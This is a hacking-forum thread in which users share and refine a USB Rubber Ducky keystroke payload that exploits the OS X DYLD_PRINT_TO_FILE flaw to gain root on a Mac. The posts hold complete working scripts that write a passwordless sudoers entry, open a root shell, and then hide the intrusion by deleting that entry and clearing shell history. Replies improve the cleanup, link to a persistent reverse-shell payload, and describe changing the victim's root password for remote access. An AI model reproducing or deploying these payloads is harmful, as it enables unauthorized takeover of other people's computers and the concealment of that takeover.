V3sth4cks153 Posted July 25, 2015 Share Posted July 25, 2015 (edited) Hi everyone ! I just saw this on thehackernews.com, and I thought I'd make a Rubber Ducky Payload for it. This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac. This is just the privilege escalation and the cleanup parts. You can put anything you want root to do in between. The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app. I've successfully tested this on an Early 2013 MacBook Pro Retina 15'' running OS X 10.10.3 Yosemite. NOTE: Since the payload uses the username of the victim, I had to make it delete a bit more than the exact length of the added text in the sudoers file (the exploit command adds this to the sudoers file, located at /etc/sudoers : "username ALL=(ALL) NOPASSWD:ALL"). This shouldn't be a problem because the last few lines are commented out. Also having a super, super long username, like 30ish characters (which I dont event know if it's possible) can be a problem. If ever you need it, here is the default sudoers file for Mac OS X 10.10 Yosemite. Hope you like it ! ********************* USE THIS PAYLOAD AT YOUR OWN RISK ! ********************* Here is the code: REM Author: V3sth4cks153 REM Title: DYLD_PRINT_TO_FILE Privilege Escalation + cleanup REM This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac. REM This is just the privilege escalation and the cleanup parts. You can put anything you want root to do in between. REM The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app. REM REM ********************* USE THIS AT YOUR OWN RISK ********************* REM REM --------------- OPEN TERMINAL --------------- GUI SPACE DELAY 100 STRING Terminal DELAY 500 ENTER DELAY 1000 REM --------------- GO TO HOME DIRECTORY --------------- STRING cd ENTER DELAY 100 REM --------------- ESCALATE PRIVS --------------- STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s ENTER REM * * REM ********************* YOU CAN PUT ANYTHING YOU WANT ROOT TO DO HERE ********************* REM * * REM --------------- CLEANUP --------------- STRING cd ENTER STRING visudo -f /etc/sudoers ENTER DOWNARROW REPEAT 50 RIGHTARROW REPEAT 40 STRING i RIGHTARROW BACKSPACE REPEAT 35 ESC STRING :w ENTER STRING :x ENTER STRING history -c ENTER DELAY 100 STRING exit ENTER STRING history -c ENTER GUI q Edited July 25, 2015 by V3sth4cks153 Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted July 26, 2015 Share Posted July 26, 2015 Nice! The only thing I'd change is your cleanup operation. Depending on how long someones username is it could overwrite and erase other parts of the sudoers file. I'd suggest using nano the CTRL-k to cut the whole line out instead of worrying about removing a certain number of chars. Other than that, its a nice implementation. Lets see how long it takes Apple to push out a patch? Quote Link to comment Share on other sites More sharing options...
V3sth4cks153 Posted July 26, 2015 Author Share Posted July 26, 2015 (edited) Nice! The only thing I'd change is your cleanup operation. Depending on how long someones username is it could overwrite and erase other parts of the sudoers file. I'd suggest using nano the CTRL-k to cut the whole line out instead of worrying about removing a certain number of chars. Other than that, its a nice implementation. Lets see how long it takes Apple to push out a patch? Thanks ! I'm glad you like it ! You're right about the cleanup operation. The only problem I had is you can't edit the sudoers file with any editor other than visudo, which is basically VIM. I just found out today that by using the ":$d" command in visudo you could delete the last line. It is better in every way as the payload is then smaller, so faster ! I'm currently working on an application of this exploit, which uploads a text file containing the ip of the victim, and then changes the root password tom anything you want so that you can ssh/sftp to the victim ! I'll post it on the forums when it's done. DONE ! As for Apple, like it's said in the article, they generally don't patch current versions of their OS, but they include a fix in the next version instead. Which I hope they won't do this time since this is far more dangerous than just making your iPhone reboot ! Here is the modified code (It's also on my GitHub) : REM Author: V3sth4cks153 REM Title: DYLD_PRINT_TO_FILE Privilege Escalation + cleanup REM This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac. REM This is just the privilege escalation and the cleanup parts. You can put anything you want root to do in between. REM The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app. REM REM ********************* USE THIS AT YOUR OWN RISK ********************* REM REM --------------- OPEN TERMINAL --------------- GUI SPACE DELAY 100 STRING Terminal DELAY 500 ENTER DELAY 1000 REM --------------- GO TO HOME DIRECTORY --------------- STRING cd ENTER DELAY 100 REM --------------- ESCALATE PRIVS --------------- STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s ENTER REM * * REM ********************* YOU CAN PUT ANYTHING YOU WANT ROOT TO DO HERE ********************* REM * * REM --------------- CLEANUP --------------- STRING cd ENTER STRING visudo -f /etc/sudoers ENTER DELAY 500 STRING :$d ENTER STRING :w ENTER STRING :x ENTER STRING history -c ENTER DELAY 100 STRING exit ENTER STRING history -c ENTER GUI q Edited July 26, 2015 by V3sth4cks153 Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted July 27, 2015 Share Posted July 27, 2015 Oh, I see what you mean! That is much nicer than using nano. (I've never had any trouble using nano to edit /etc/sudoers as I sudo'd it first?) I've never really been able to get along with vi. Apple are still likely to be pretty slow at patching this. If it was a serious RCE then we might see a different reaction, but in the real world, people are so precious of their Macs that its gonna be so hard to get the physical access to a machine that you need to exploit this. (Thats Apple's justification, anyway!). Quote Link to comment Share on other sites More sharing options...
V3sth4cks153 Posted July 27, 2015 Author Share Posted July 27, 2015 (edited) Oh, I see what you mean! That is much nicer than using nano. (I've never had any trouble using nano to edit /etc/sudoers as I sudo'd it first?) I've never really been able to get along with vi. Apple are still likely to be pretty slow at patching this. If it was a serious RCE then we might see a different reaction, but in the real world, people are so precious of their Macs that its gonna be so hard to get the physical access to a machine that you need to exploit this. (Thats Apple's justification, anyway!). It is indeed ! I personally also prefer nano, but then I saw this text in the sudoers file which convinced me there must be a reason why Apple says to use visudo. # sudoers file. # # This file MUST be edited with the 'visudo' command as root. # Failure to use 'visudo' may result in syntax or file permission errors # that prevent sudo from running. # I also think Apple will likely be slow at patching this. But by searching for "DYLD_PRINT_TO_FILE post module" on Google, I found this which pretty much means that if an attacker has user-level control of your Mac already, he can use this module to take full control of the machine, even without physical access ! But since it's already been 5 days since this has been discovered, I find it really unlikely that Apple will release a patch. Edited July 27, 2015 by V3sth4cks153 Quote Link to comment Share on other sites More sharing options...
Matto Posted August 9, 2015 Share Posted August 9, 2015 This vulnerability is great! I've just created a payload for a persistent reverse bash in OS X using it: https://forums.hak5.org/index.php?/topic/36390-payload-mac-os-x-simple-persistent-reverse-bash/ About visudo: I've been testing a little, and it seems that nothing happens if you directly edit «/etc/sudoers», so what my script does is, once the payload was executed, just delete the last line of the file like this: REM --------------- SET PRIVILEGES BACK TO NORMAL --------------- STRING echo -e '$d\nw\nq'| ed /etc/sudoers ENTER DELAY 200 I tested this in my own Mac and it works ok. It's way simpler and faster than using visudo. Hope it helps! Quote Link to comment Share on other sites More sharing options...
V3sth4cks153 Posted August 10, 2015 Author Share Posted August 10, 2015 (edited) This vulnerability is great! I've just created a payload for a persistent reverse bash in OS X using it: https://forums.hak5.org/index.php?/topic/36390-payload-mac-os-x-simple-persistent-reverse-bash/ About visudo: I've been testing a little, and it seems that nothing happens if you directly edit «/etc/sudoers», so what my script does is, once the payload was executed, just delete the last line of the file like this: REM --------------- SET PRIVILEGES BACK TO NORMAL ---------------STRING echo -e '$d\nw\nq'| ed /etc/sudoersENTERDELAY 200I tested this in my own Mac and it works ok. It's way simpler and faster than using visudo.Hope it helps! Hi. That's really cool ! It's even better than the ":$d" command in visudo ! Being a bit of a bash beginner, I didn't even think about not opening the file in the first place... I'll test it on my computer when I'm back home from holidays. Edited August 10, 2015 by V3sth4cks153 Quote Link to comment Share on other sites More sharing options...
Matto Posted August 10, 2015 Share Posted August 10, 2015 Hope it works for you :) I've tested in a couple of Macs by now, and everything works as expected. Quote Link to comment Share on other sites More sharing options...
V3sth4cks153 Posted August 10, 2015 Author Share Posted August 10, 2015 Hope it works for you :) I've tested in a couple of Macs by now, and everything works as expected. I hope so ! It would be so cool ! But is there a way to disable it though ? If so, could you give me the command please ? Thanks Quote Link to comment Share on other sites More sharing options...
Matto Posted August 10, 2015 Share Posted August 10, 2015 To disable it you just should run: sudo crontab -e In the victim's computer. This will open a text editor and you just have to remove only the last line which is the one that the script created. Then save and you're done. Quote Link to comment Share on other sites More sharing options...
V3sth4cks153 Posted August 10, 2015 Author Share Posted August 10, 2015 To disable it you just should run: sudo crontab -e In the victim's computer. This will open a text editor and you just have to remove only the last line which is the one that the script created. Then save and you're done. Ok great ! Thanks ! I'll give me feedback as soon as I get a chance to test it. Quote Link to comment Share on other sites More sharing options...
V3sth4cks153 Posted August 28, 2015 Author Share Posted August 28, 2015 The vulnerability has been patched in 10.10.5 ! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.